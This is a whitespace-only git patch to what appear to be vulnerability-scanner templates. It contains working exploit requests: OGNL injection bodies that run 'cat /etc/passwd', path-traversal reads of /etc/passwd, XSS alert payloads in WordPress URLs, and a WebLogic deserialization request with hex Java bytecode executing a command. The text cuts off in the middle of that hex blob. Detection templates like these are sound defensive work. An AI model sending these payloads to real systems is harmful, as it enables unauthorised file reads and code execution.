From 77103bc629fd0e64888d27a85ded6676821d4458 Mon Sep 17 00:00:00 2001
From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com>
Date: Thu, 19 Aug 2021 17:44:46 +0300
Subject: [PATCH] Satisfying the linter (all errors and warnings) * whitespace
modifications only
---
cnvd/CNVD-2021-30167.yaml | 4 +-
cves/2007/CVE-2007-4556.yaml | 2 +-
cves/2012/CVE-2012-1835.yaml | 8 +-
cves/2013/CVE-2013-1965.yaml | 2 +-
cves/2013/CVE-2013-3827.yaml | 4 +-
cves/2013/CVE-2013-7240.yaml | 4 +-
cves/2014/CVE-2014-4210.yaml | 4 +-
cves/2015/CVE-2015-2080.yaml | 2 +-
cves/2015/CVE-2015-3337.yaml | 36 +++---
cves/2015/CVE-2015-5688.yaml | 40 +++---
cves/2015/CVE-2015-7823.yaml | 4 +-
cves/2016/CVE-2016-2004.yaml | 4 +-
cves/2017/CVE-2017-1000028.yaml | 36 +++---
cves/2017/CVE-2017-1000486.yaml | 8 +-
cves/2017/CVE-2017-10271.yaml | 90 +++++++-------
cves/2017/CVE-2017-12149.yaml | 6 +-
cves/2017/CVE-2017-12542.yaml | 4 +-
cves/2017/CVE-2017-12615.yaml | 38 +++---
cves/2017/CVE-2017-12629.yaml | 8 +-
cves/2017/CVE-2017-12637.yaml | 6 +-
cves/2017/CVE-2017-14535.yaml | 4 +-
cves/2017/CVE-2017-14537.yaml | 6 +-
cves/2017/CVE-2017-15944.yaml | 4 +-
cves/2017/CVE-2017-3506.yaml | 4 +-
cves/2017/CVE-2017-3528.yaml | 4 +-
cves/2017/CVE-2017-5487.yaml | 4 +-
cves/2017/CVE-2017-5638.yaml | 18 +--
cves/2017/CVE-2017-9805.yaml | 114 +++++++++---------
cves/2018/CVE-2018-16059.yaml | 4 +-
cves/2018/CVE-2018-16283.yaml | 4 +-
cves/2018/CVE-2018-17431.yaml | 4 +-
cves/2018/CVE-2018-8715.yaml | 2 +-
cves/2019/CVE-2019-0193.yaml | 6 +-
cves/2019/CVE-2019-0221.yaml | 8 +-
cves/2019/CVE-2019-1010287.yaml | 2 +-
cves/2019/CVE-2019-12616.yaml | 8 +-
cves/2019/CVE-2019-13101.yaml | 6 +-
cves/2019/CVE-2019-15043.yaml | 2 +-
cves/2019/CVE-2019-15107.yaml | 2 +-
cves/2019/CVE-2019-16097.yaml | 6 +-
cves/2019/CVE-2019-17506.yaml | 2 +-
cves/2019/CVE-2019-2616.yaml | 4 +-
cves/2019/CVE-2019-2767.yaml | 4 +-
cves/2019/CVE-2019-3396.yaml | 18 +--
cves/2019/CVE-2019-7238.yaml | 4 +-
cves/2019/CVE-2019-7256.yaml | 2 +-
cves/2019/CVE-2019-9733.yaml | 30 ++---
cves/2020/CVE-2019-9618.yaml | 4 +-
cves/2020/CVE-2020-11034.yaml | 6 +-
cves/2020/CVE-2020-11978.yaml | 6 +-
cves/2020/CVE-2020-13167.yaml | 16 +--
cves/2020/CVE-2020-13700.yaml | 6 +-
cves/2020/CVE-2020-13937.yaml | 12 +-
cves/2020/CVE-2020-14883.yaml | 2 +-
cves/2020/CVE-2020-15148.yaml | 4 +-
cves/2020/CVE-2020-15227.yaml | 8 +-
cves/2020/CVE-2020-21224.yaml | 2 +-
cves/2020/CVE-2020-27866.yaml | 6 +-
cves/2020/CVE-2020-27986.yaml | 6 +-
cves/2020/CVE-2020-36112.yaml | 4 +-
cves/2020/CVE-2020-36289.yaml | 4 +-
cves/2020/CVE-2020-5307.yaml | 2 +-
cves/2020/CVE-2020-7209.yaml | 4 +-
cves/2020/CVE-2020-7961.yaml | 4 +-
cves/2020/CVE-2020-9490.yaml | 8 +-
cves/2021/CVE-2021-20090.yaml | 6 +-
cves/2021/CVE-2021-20091.yaml | 6 +-
cves/2021/CVE-2021-20092.yaml | 6 +-
cves/2021/CVE-2021-21307.yaml | 6 +-
cves/2021/CVE-2021-22214.yaml | 6 +-
cves/2021/CVE-2021-24176.yaml | 4 +-
cves/2021/CVE-2021-24237.yaml | 4 +-
cves/2021/CVE-2021-24285.yaml | 6 +-
cves/2021/CVE-2021-24316.yaml | 4 +-
cves/2021/CVE-2021-24495.yaml | 4 +-
cves/2021/CVE-2021-25646.yaml | 4 +-
cves/2021/CVE-2021-26295.yaml | 6 +-
cves/2021/CVE-2021-26812.yaml | 4 +-
cves/2021/CVE-2021-26855.yaml | 10 +-
cves/2021/CVE-2021-27651.yaml | 4 +-
cves/2021/CVE-2021-27850.yaml | 2 +-
cves/2021/CVE-2021-27905.yaml | 8 +-
cves/2021/CVE-2021-28073.yaml | 4 +-
cves/2021/CVE-2021-28149.yaml | 2 +-
cves/2021/CVE-2021-29203.yaml | 4 +-
cves/2021/CVE-2021-29484.yaml | 4 +-
cves/2021/CVE-2021-3129.yaml | 4 +-
cves/2021/CVE-2021-32820.yaml | 4 +-
cves/2021/CVE-2021-3377.yaml | 4 +-
cves/2021/CVE-2021-34473.yaml | 6 +-
cves/2021/CVE-2021-35336.yaml | 4 +-
cves/2021/CVE-2021-35464.yaml | 2 +-
.../alibaba-canal-default-password.yaml | 2 +-
default-logins/gitlab/gitlab-weak-login.yaml | 2 +-
.../grafana/grafana-default-credential.yaml | 6 +-
dns/azure-takeover-detection.yaml | 6 +-
dns/detect-dangling-cname.yaml | 8 +-
exposures/apis/wadl-api.yaml | 4 +-
exposures/configs/exposed-gitignore.yaml | 4 +-
.../configs/exposed-sharepoint-list.yaml | 4 +-
exposures/configs/qdpm-info-leak.yaml | 2 +-
fuzzing/iis-shortname.yaml | 4 +-
headless/postmessage-tracker.yaml | 44 +++----
miscellaneous/tabnabbing-check.yaml | 6 +-
miscellaneous/unpatched-coldfusion.yaml | 4 +-
misconfiguration/akamai-arl-xss.yaml | 10 +-
misconfiguration/exposed-service-now.yaml | 4 +-
.../gitlab/gitlab-public-repos.yaml | 4 +-
.../gitlab/gitlab-public-snippets.yaml | 4 +-
.../gitlab/gitlab-user-enumeration.yaml | 6 +-
.../sap/sap-netweaver-info-leak.yaml | 4 +-
.../zabbix-dashboards-access.yaml | 4 +-
network/deprecated-sshv1-detection.yaml | 4 +-
network/openssh5.3-detect.yaml | 6 +-
takeovers/ceros-takeover.yaml | 4 +-
technologies/detect-sentry.yaml | 4 +-
.../microsoft-exchange-server-detect.yaml | 2 +-
technologies/waf-detect.yaml | 8 +-
.../apache/apache-flink-unauth-rce.yaml | 6 +-
.../apache/apache-solr-file-read.yaml | 6 +-
vulnerabilities/generic/cache-poisoning.yaml | 4 +-
.../lsoft/listserv_maestro_rce.yaml | 4 +-
vulnerabilities/oracle/oracle-ebs-xss.yaml | 6 +-
.../other/buffalo-config-injection.yaml | 6 +-
vulnerabilities/other/concrete-xss.yaml | 6 +-
.../other/dlink-850L-info-leak.yaml | 2 +-
.../other/maian-cart-preauth-rce.yaml | 6 +-
.../ms-exchange-server-reflected-xss.yaml | 4 +-
.../nginx-merge-slashes-path-traversal.yaml | 4 +-
vulnerabilities/other/opensns-rce.yaml | 4 +-
vulnerabilities/other/rconfig-rce.yaml | 4 +-
.../other/sonicwall-sslvpn-shellshock.yaml | 4 +-
.../other/wooyun-path-traversal.yaml | 6 +-
vulnerabilities/other/yapi-rce.yaml | 8 +-
.../wordpress/wordpress-woocommerce-sqli.yaml | 4 +-
.../wordpress-wpcourses-info-disclosure.yaml | 4 +-
.../wp-123contactform-plugin-listing.yaml | 4 +-
.../wp-memphis-documents-library-lfi.yaml | 4 +-
.../wordpress/wp-slideshow-xss.yaml | 6 +-
.../wp-woocommerce-pdf-invoice-listing.yaml | 6 +-
140 files changed, 543 insertions(+), 543 deletions(-)
diff --git a/cnvd/CNVD-2021-30167.yaml b/cnvd/CNVD-2021-30167.yaml
index 7b7bc68cd0..c6a28b6fb0 100644
--- a/cnvd/CNVD-2021-30167.yaml
+++ b/cnvd/CNVD-2021-30167.yaml
@@ -5,8 +5,8 @@ info:
author: pikpikcu
severity: high
reference:
- - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- - https://www.cnvd.org.cn/webinfo/show/6491
+ - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
+ - https://www.cnvd.org.cn/webinfo/show/6491
tags: beanshell,rce,cnvd
requests:
diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml
index 61b24bab2c..1a7b1450ed 100644
--- a/cves/2007/CVE-2007-4556.yaml
+++ b/cves/2007/CVE-2007-4556.yaml
@@ -15,7 +15,7 @@ requests:
headers:
Content-Type: application/x-www-form-urlencoded
body: |
- username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
+ username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and
matchers:
diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml
index 9bc5c08991..a176328129 100644
--- a/cves/2012/CVE-2012-1835.yaml
+++ b/cves/2012/CVE-2012-1835.yaml
@@ -12,10 +12,10 @@ requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
-# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
-# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
-# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
-# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+ # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
+ # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+ # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+ # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
matchers-condition: and
matchers:
diff --git a/cves/2013/CVE-2013-1965.yaml b/cves/2013/CVE-2013-1965.yaml
index 5539dfc559..e2e5f0a70c 100644
--- a/cves/2013/CVE-2013-1965.yaml
+++ b/cves/2013/CVE-2013-1965.yaml
@@ -15,7 +15,7 @@ requests:
headers:
Content-Type: application/x-www-form-urlencoded
body: |
- name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
+ name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and
matchers:
diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml
index 033bea7806..2e0d3cb4a9 100644
--- a/cves/2013/CVE-2013-3827.yaml
+++ b/cves/2013/CVE-2013-3827.yaml
@@ -7,8 +7,8 @@ info:
description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
tags: cve,cve2013,lfi,javafaces,oracle
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2013-3827
- - https://www.exploit-db.com/exploits/38802
+ - https://nvd.nist.gov/vuln/detail/CVE-2013-3827
+ - https://www.exploit-db.com/exploits/38802
requests:
- method: GET
diff --git a/cves/2013/CVE-2013-7240.yaml b/cves/2013/CVE-2013-7240.yaml
index a91e2000b3..35cf6180ea 100644
--- a/cves/2013/CVE-2013-7240.yaml
+++ b/cves/2013/CVE-2013-7240.yaml
@@ -6,8 +6,8 @@ info:
severity: high
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
reference:
- - https://www.exploit-db.com/exploits/38936
- - https://nvd.nist.gov/vuln/detail/CVE-2013-7240
+ - https://www.exploit-db.com/exploits/38936
+ - https://nvd.nist.gov/vuln/detail/CVE-2013-7240
tags: cve,cve2013,wordpress,wp-plugin,lfi
requests:
diff --git a/cves/2014/CVE-2014-4210.yaml b/cves/2014/CVE-2014-4210.yaml
index 9a70384c82..cc9b0f8793 100644
--- a/cves/2014/CVE-2014-4210.yaml
+++ b/cves/2014/CVE-2014-4210.yaml
@@ -6,8 +6,8 @@ info:
severity: medium
tags: cve,cve2014,weblogic,oracle,ssrf
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2014-4210
- - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-4210
+ - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
requests:
- method: GET
diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml
index 52a97a3a65..f70ef7d40a 100644
--- a/cves/2015/CVE-2015-2080.yaml
+++ b/cves/2015/CVE-2015-2080.yaml
@@ -9,7 +9,7 @@ info:
- https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
- http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
description: |
- The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
+ The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
tags: cve,cve2015,jetty
requests:
diff --git a/cves/2015/CVE-2015-3337.yaml b/cves/2015/CVE-2015-3337.yaml
index 8b3acdf235..57306fca9b 100644
--- a/cves/2015/CVE-2015-3337.yaml
+++ b/cves/2015/CVE-2015-3337.yaml
@@ -1,25 +1,25 @@
id: CVE-2015-3337
info:
- name: Elasticsearch Head plugin LFI
- author: pdteam
- severity: high
- description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
- reference: https://www.exploit-db.com/exploits/37054/
- tags: cve,cve2015,elastic,lfi
+ name: Elasticsearch Head plugin LFI
+ author: pdteam
+ severity: high
+ description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
+ reference: https://www.exploit-db.com/exploits/37054/
+ tags: cve,cve2015,elastic,lfi
requests:
- - method: GET
- path:
- - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
+ - method: GET
+ path:
+ - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0"
- part: body
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+ part: body
- - type: status
- status:
- - 200
+ - type: status
+ status:
+ - 200
diff --git a/cves/2015/CVE-2015-5688.yaml b/cves/2015/CVE-2015-5688.yaml
index 863d5b557d..aef5505ea8 100644
--- a/cves/2015/CVE-2015-5688.yaml
+++ b/cves/2015/CVE-2015-5688.yaml
@@ -1,27 +1,27 @@
id: CVE-2015-5688
info:
- name: Geddy before v13.0.8 LFI
- author: pikpikcu
- severity: high
- description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
- reference:
- - https://nodesecurity.io/advisories/geddy-directory-traversal
- - https://github.com/geddy/geddy/issues/697
- tags: cve,cve2015,geddy,lfi
+ name: Geddy before v13.0.8 LFI
+ author: pikpikcu
+ severity: high
+ description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
+ reference:
+ - https://nodesecurity.io/advisories/geddy-directory-traversal
+ - https://github.com/geddy/geddy/issues/697
+ tags: cve,cve2015,geddy,lfi
requests:
- - method: GET
- path:
- - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+ - method: GET
+ path:
+ - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0"
- part: body
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+ part: body
- - type: status
- status:
- - 200
+ - type: status
+ status:
+ - 200
diff --git a/cves/2015/CVE-2015-7823.yaml b/cves/2015/CVE-2015-7823.yaml
index 4fe2a7a788..6cb8fcbda7 100644
--- a/cves/2015/CVE-2015-7823.yaml
+++ b/cves/2015/CVE-2015-7823.yaml
@@ -5,8 +5,8 @@ info:
author: 0x_Akoko
description: The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability
reference:
- - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
- - https://nvd.nist.gov/vuln/detail/CVE-2015-7823
+ - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-7823
severity: low
tags: cve,cve2015,kentico,redirect
diff --git a/cves/2016/CVE-2016-2004.yaml b/cves/2016/CVE-2016-2004.yaml
index 49679ca46d..639320dfc8 100644
--- a/cves/2016/CVE-2016-2004.yaml
+++ b/cves/2016/CVE-2016-2004.yaml
@@ -7,8 +7,8 @@ info:
tags: cve,cve2016,network,iot,hp,rce
description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
reference:
- - https://www.exploit-db.com/exploits/39858
- - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
+ - https://www.exploit-db.com/exploits/39858
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
network:
- inputs:
diff --git a/cves/2017/CVE-2017-1000028.yaml b/cves/2017/CVE-2017-1000028.yaml
index 272270c8a2..7dc6d15282 100644
--- a/cves/2017/CVE-2017-1000028.yaml
+++ b/cves/2017/CVE-2017-1000028.yaml
@@ -1,24 +1,24 @@
id: CVE-2017-1000028
info:
- name: GlassFish LFI
- author: pikpikcu
- severity: high
- description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
- reference: https://www.exploit-db.com/exploits/45196
- tags: cve,cve2017,oracle,glassfish,lfi
+ name: GlassFish LFI
+ author: pikpikcu
+ severity: high
+ description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
+ reference: https://www.exploit-db.com/exploits/45196
+ tags: cve,cve2017,oracle,glassfish,lfi
requests:
- - method: GET
- path:
- - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "/sbin/nologin"
- part: body
+ - method: GET
+ path:
+ - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "/sbin/nologin"
+ part: body
- - type: status
- status:
- - 200
\ No newline at end of file
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2017/CVE-2017-1000486.yaml b/cves/2017/CVE-2017-1000486.yaml
index 3f8ce3acd8..41d8c711b1 100644
--- a/cves/2017/CVE-2017-1000486.yaml
+++ b/cves/2017/CVE-2017-1000486.yaml
@@ -6,10 +6,10 @@ info:
severity: critical
description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
reference:
- - https://github.com/mogwailabs/CVE-2017-1000486
- - https://github.com/pimps/CVE-2017-1000486
- - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
- - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
+ - https://github.com/mogwailabs/CVE-2017-1000486
+ - https://github.com/pimps/CVE-2017-1000486
+ - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
tags: cve,cve2017,primetek,rce
requests:
diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml
index be45ec2616..2782404f8a 100644
--- a/cves/2017/CVE-2017-10271.yaml
+++ b/cves/2017/CVE-2017-10271.yaml
@@ -13,52 +13,52 @@ info:
requests:
- raw:
- |
- POST /wls-wsat/CoordinatorPortType HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
- Accept-Language: en
- User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
- Connection: close
- Content-Type: text/xml
- Content-Length: 5178
+ POST /wls-wsat/CoordinatorPortType HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Accept-Language: en
+ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+ Connection: close
+ Content-Type: text/xml
+ Content-Length: 5178
-
-
-
-
-
-
- 0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034
-
-
-
- com.supeream.exploits.XmlExp
-
-
-
- cat /etc/passwd
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+
+
+
+
+
+
+ 0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6